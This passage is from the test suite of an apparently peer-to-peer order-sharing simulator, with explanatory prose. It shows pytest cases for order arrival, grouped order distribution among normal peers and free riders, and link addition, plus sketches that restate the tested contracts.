single_run_instance.add_new_links_helper(peer_list[7], 6, -1)
```
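Read together, the three happy-path tests and the error test describe a fairly simple contract for add_new_links_helper(). The sketch below restates that contract in standalone form; the argument order (peer, max, min) follows the calls above, while everything else is a simplification rather than SingleRun's implementation.
```python
# Standalone restatement of the contract tested above; not SingleRun's code.
import random
from typing import Set


def add_new_links_sketch(peer: str, candidates: Set[str], neighbors: Set[str],
                         max_num: int, min_num: int) -> None:
    # Reject (max < min), zero, and negative requests, as the error test expects.
    if not 0 < min_num <= max_num:
        raise ValueError("Input value is invalid.")
    pool = [c for c in candidates if c != peer and c not in neighbors]
    random.shuffle(pool)
    added = 0
    for candidate in pool:
        if added == max_num:
            break
        neighbors.add(candidate)
        added += 1
    # If the pool runs out before min_num is reached, we stop anyway
    # ("tried the best"), which is exactly what the third test checks.
```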
#### File: test/single_and_multi_run/test_group_of_orders_arrival_helper.py
```python
import random
import pytest
from single_run import SingleRun
from engine import Engine
from performance import Performance
from scenario import Scenario
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE
from .__init__ import mock_random_choice, fake_gauss
NUM_ORDERS_TO_ARRIVE = 240
@pytest.mark.parametrize(
"scenario, engine, performance, num_arrival",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE, NUM_ORDERS_TO_ARRIVE)],
)
def test_group_of_orders_arrival_helper(
scenario: Scenario,
engine: Engine,
performance: Performance,
num_arrival: int,
monkeypatch,
) -> None:
"""
This tests group_of_orders_arrival_helper().
We test whether the group of orders is properly created.
"""
# pylint: disable=too-many-locals
# This test function is a bit long but still fine.
# Arrange.
# Mock/fake functions. Similar to test_group_of_peers_arrival_helper.py.
monkeypatch.setattr(random, "choices", mock_random_choice)
monkeypatch.setattr(random, "gauss", fake_gauss)
# Create the instance, 20 normal peers, and 5 free riders.
total_num_normal_peers = 20
total_num_free_riders = 5
single_run_instance = SingleRun(scenario, engine, performance)
for _ in range(total_num_normal_peers):
single_run_instance.peer_arrival("normal", {})
for _ in range(total_num_free_riders):
single_run_instance.peer_arrival("free_rider", {})
normal_peer_list = list(single_run_instance.peer_type_set_mapping["normal"])
free_rider_list = list(single_run_instance.peer_type_set_mapping["free_rider"])
single_run_instance.order_full_set.clear()
# Act.
single_run_instance.group_of_orders_arrival_helper(num_arrival)
# Assert.
assert len(single_run_instance.order_full_set) == num_arrival
# First of all, calculate the expected number of orders that each peer will get. This is
# non-trivial and it follows the logic in mock_random_choice().
for idx in range(total_num_normal_peers):
assert (
len(normal_peer_list[idx].order_pending_orderinfo_mapping)
== NUM_ORDERS_TO_ARRIVE / total_num_normal_peers
)
num_default_order = sum(
1
for order in normal_peer_list[idx].order_pending_orderinfo_mapping
if order.order_type == "default"
)
sum_of_weights = sum(
value.mean
for value in scenario.peer_type_property[
"normal"
].initial_orderbook_size_dict.values()
)
assert (
num_default_order
== len(normal_peer_list[idx].order_pending_orderinfo_mapping)
* scenario.peer_type_property["normal"]
.initial_orderbook_size_dict["default"]
.mean
/ sum_of_weights
)
num_nft = sum(
1
for order in normal_peer_list[idx].order_pending_orderinfo_mapping
if order.order_type == "nft"
)
assert (
num_nft
== len(normal_peer_list[idx].order_pending_orderinfo_mapping)
* scenario.peer_type_property["normal"]
.initial_orderbook_size_dict["nft"]
.mean
/ sum_of_weights
)
# Assert free riders.
for peer in free_rider_list:
assert not peer.order_pending_orderinfo_mapping
# Assert the order sequence number update
assert single_run_instance.latest_order_seq == num_arrival
```
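The per-peer and per-type assertions above reduce to simple proportional arithmetic once the mocked randomness spreads orders evenly. The numbers below use hypothetical order-type means (the real values come from SCENARIO_SAMPLE's initial_orderbook_size_dict), but the shape of the computation is the one the test relies on.
```python
# Back-of-the-envelope version of the assertions above; TYPE_MEANS is hypothetical.
NUM_ORDERS = 240
NUM_NORMAL_PEERS = 20
TYPE_MEANS = {"default": 7.5, "nft": 2.5}  # placeholder means, not SCENARIO_SAMPLE's

orders_per_peer = NUM_ORDERS / NUM_NORMAL_PEERS        # 12 orders per normal peer
total_weight = sum(TYPE_MEANS.values())
per_type = {t: orders_per_peer * m / total_weight for t, m in TYPE_MEANS.items()}
print(orders_per_peer, per_type)  # 12.0 {'default': 9.0, 'nft': 3.0}
```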
#### File: test/single_and_multi_run/test_order_arrival.py
```python
import pytest
from scenario import Scenario
from engine import Engine
from performance import Performance
from node import Peer
from data_types import ConcaveParameters, RandomParameter
from single_run import SingleRun
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_peer,
PERFORMANCE_SAMPLE,
)
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_order_arrival__normal(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This tests order_arrival() in the normal case.
"""
# Arrange.
# create the single_run instance and a peer.
single_run_instance = SingleRun(scenario, engine, performance)
single_run_instance.peer_arrival("normal", {})
peer: Peer = next(iter(single_run_instance.peer_full_set))
peer.order_pending_orderinfo_mapping.clear()
# Preparing parameters
expiration_value = 300
settlement = ConcaveParameters(
method="ConcaveParameters", sensitivity=1.0, max_prob=0.0
)
cancellation = RandomParameter(method="RandomParameter", prob=0.0)
# Act.
single_run_instance.order_arrival(
target_peer=peer,
order_type="default",
expiration=expiration_value,
settlement=settlement,
cancellation=cancellation,
)
single_run_instance.order_arrival(
target_peer=peer,
order_type="nft",
expiration=expiration_value,
settlement=settlement,
cancellation=cancellation,
)
# Assert.
assert len(peer.order_pending_orderinfo_mapping) == 2
order_iterator = iter(peer.order_pending_orderinfo_mapping)
order_type_set = set()
for _ in range(2):
order = next(order_iterator)
order_type_set.add(order.order_type)
assert order.expiration == expiration_value
assert order in single_run_instance.order_full_set
assert "default" in order_type_set
assert "nft" in order_type_set
assert single_run_instance.latest_order_seq == 2
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_order_arrival__error(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This tests order_arrival() when the target peer does not exist.
"""
# Arrange.
# create the single_run instance and a peer.
single_run_instance = SingleRun(scenario, engine, performance)
peer: Peer = create_a_test_peer(scenario, engine)[0]
peer.order_pending_orderinfo_mapping.clear()
settlement = ConcaveParameters(
method="ConcaveParameters", sensitivity=1.0, max_prob=0.0
)
cancellation = RandomParameter(method="RandomParameter", prob=0.0)
# Act and Assert.
with pytest.raises(ValueError, match="Cannot find target peer."):
single_run_instance.order_arrival(
target_peer=peer,
order_type="default",
expiration=500,
settlement=settlement,
cancellation=cancellation,
)
``` |
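The settlement and cancellation arguments passed to order_arrival() above are plain parameter records from data_types.py. Their exact definitions are not shown here, so the TypedDict sketch below is only a guess at their shape based on how the tests construct them; field semantics are assumptions.
```python
# Guessed shape of the parameter records used above; the real classes live in
# data_types.py and may differ. Field semantics are assumptions.
from typing import TypedDict


class ConcaveParametersSketch(TypedDict):
    method: str        # always "ConcaveParameters" in the tests above
    sensitivity: float
    max_prob: float    # 0.0 in the tests (presumably disabling settlement)


class RandomParameterSketch(TypedDict):
    method: str        # always "RandomParameter" in the tests above
    prob: float        # 0.0 in the tests (presumably disabling cancellation)


settlement = ConcaveParametersSketch(method="ConcaveParameters", sensitivity=1.0, max_prob=0.0)
cancellation = RandomParameterSketch(method="RandomParameter", prob=0.0)
```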